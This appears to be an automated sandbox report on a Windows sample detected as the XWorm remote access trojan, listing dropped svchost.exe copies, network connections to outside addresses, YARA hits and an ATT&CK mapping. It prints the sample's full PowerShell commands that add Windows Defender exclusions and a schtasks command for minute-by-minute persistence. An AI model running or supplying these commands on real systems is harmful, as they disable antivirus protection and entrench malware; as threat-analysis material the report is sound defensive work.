Source: C:\ProgramData\svchost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.141.27.248 7777			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 208.95.112.1 80			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Roaming\svchost.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Queries volume information: C:\Users\user\Desktop\Fulloption_V2.1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\ProgramData\svchost.exe	Queries volume information: C:\ProgramData\svchost.exe VolumeInformation
Source: C:\ProgramData\svchost.exe	Queries volume information: C:\ProgramData\svchost.exe VolumeInformation

Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

Code function: 2_2_00007FF6AE82DDD4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_00007FF6AE82DDD4

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: svchost.exe, 00000003.00000002.3403575699.000000001D200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3406373230.000000001D29A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3406589599.000000001D2AA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Roaming\svchost.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 3.0.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fulloption_V2.1.exe.3276bd8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fulloption_V2.1.exe.3289218.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.336f760.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.336f760.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3395976559.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Fulloption_V2.1.exe PID: 2012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4000, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 3.0.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fulloption_V2.1.exe.3276bd8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fulloption_V2.1.exe.3289218.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.336f760.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.336f760.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3395976559.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Fulloption_V2.1.exe PID: 2012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4000, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	12 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
